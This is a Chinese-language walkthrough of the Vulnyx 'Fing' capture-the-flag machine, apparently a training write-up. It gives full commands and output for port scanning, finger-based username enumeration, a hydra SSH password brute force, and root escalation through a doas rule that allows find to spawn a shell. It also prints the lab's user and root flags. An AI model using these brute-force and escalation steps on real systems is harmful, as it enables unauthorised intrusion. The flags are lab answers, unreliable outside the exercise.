Vulnyx-Fing-Walkthrough
城南花已开 Lv6

信息收集

服务探测

BASH
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.218 08:00:27:56:21:5c PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e5:e5:eb VMware, Inc.

16 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.067 seconds (123.85 hosts/sec). 4 responded
export ip=192.168.60.218
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
TreadStone was here 🚀

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.218:22
Open 192.168.60.218:79
Open 192.168.60.218:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-28 14:10 CST
Initiating ARP Ping Scan at 14:10
Scanning 192.168.60.218 [1 port]
Completed ARP Ping Scan at 14:10, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:10
Completed Parallel DNS resolution of 1 host. at 14:10, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:10
Scanning 192.168.60.218 [3 ports]
Discovered open port 80/tcp on 192.168.60.218
Discovered open port 79/tcp on 192.168.60.218
Discovered open port 22/tcp on 192.168.60.218
Completed SYN Stealth Scan at 14:10, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.60.218
Host is up, received arp-response (0.00050s latency).
Scanned at 2025-02-28 14:10:47 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
79/tcp open finger syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:56:21:5C (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

扫一下目录,并没有任何东西

源代码也查看了,和标准的默认页面没有区别

BASH
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.218
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 10701]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

用户枚举

看到还开放了79端口,利用工具批量枚举一下

存在用户adam

BASH
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
❯ ./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t $ip
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )

----------------------------------------------------------
| Scan Information |
----------------------------------------------------------

Worker Processes ......... 5
Usernames file ........... /usr/share/seclists/Usernames/Names/names.txt
Target count ............. 1
Username count ........... 10177
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used

######## Scan started at Fri Feb 28 14:39:08 2025 #########
adam@192.168.60.218: Login: adam Name: adam..Directory: /home/adam Shell: /bin/bash..Last login Sun Apr 23 13:21 2023 (CEST) on pts/0 from 192.168.1.10..No mail...No Plan...
akemi@192.168.60.218: finger: akemi: no such user...
allys@192.168.60.218: finger: allys: no such user...
amarjit@192.168.60.218: finger: amarjit: no such user...
angie@192.168.60.218: finger: angie: no such user...
anthea@192.168.60.218: finger: anthea: no such user...
arianne@192.168.60.218: finger: arianne: no such user...
asia@192.168.60.218: finger: asia: no such user...
audrie@192.168.60.218: finger: audrie: no such user...
bedford@192.168.60.218: finger: bedford: no such user...
begum@192.168.60.218: finger: begum: no such user...
######## Scan completed at Fri Feb 28 14:39:16 2025 #########
11 results.

10177 queries in 8 seconds (1272.1 queries / sec)

因为什么信息都没有,只能尝试爆破了

爆了好一会,得到密码passion

BASH
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
❯ hydra -l adam -P /usr/share/wordlists/rockyou.txt ssh://$ip -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-28 14:41:39
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.60.218:22/
[STATUS] 191.00 tries/min, 191 tries in 00:01h, 14344215 to do in 1251:41h, 9 active
[STATUS] 163.33 tries/min, 490 tries in 00:03h, 14343916 to do in 1463:40h, 9 active
[22][ssh] host: 192.168.60.218 login: adam password: passion
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 7 final worker threads did not complete until end.
[ERROR] 7 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-28 14:46:24

用户提权

ssh连接一下

BASH
1
2
3
4
5
6
7
8
9
10
11
12
❯ ssh adam@$ip
The authenticity of host '192.168.60.218 (192.168.60.218)' can't be established.
ED25519 key fingerprint is SHA256:3dqq7f/jDEeGxYQnF2zHbpzEtjjY49/5PvV5/4MMqns.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.218' (ED25519) to the list of known hosts.
adam@192.168.60.218's password:
Linux fing 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64
Last login: Sun Apr 23 13:21:44 2023 from 192.168.1.10
adam@fing:~$ cat user.txt
ff18a9aca2d1dac41a5c26e6667bea9d

Root提权

信息收集后,虽然没有sudo权限

但存在doas,看一下配置,允许以root身份执行find

正常利用find提权即可

BASH
1
2
3
4
5
6
7
8
adam@fing:/tmp$ cat /etc/doas.conf
permit nopass keepenv adam as root cmd /usr/bin/find
adam@fing:/tmp$ doas /usr/bin/find . -exec /bin/sh \; -quit
# id
uid=0(root) gid=0(root) grupos=0(root)
# cat /root/root.txt
1edf2dfe68c6745e93affa42be9a80ce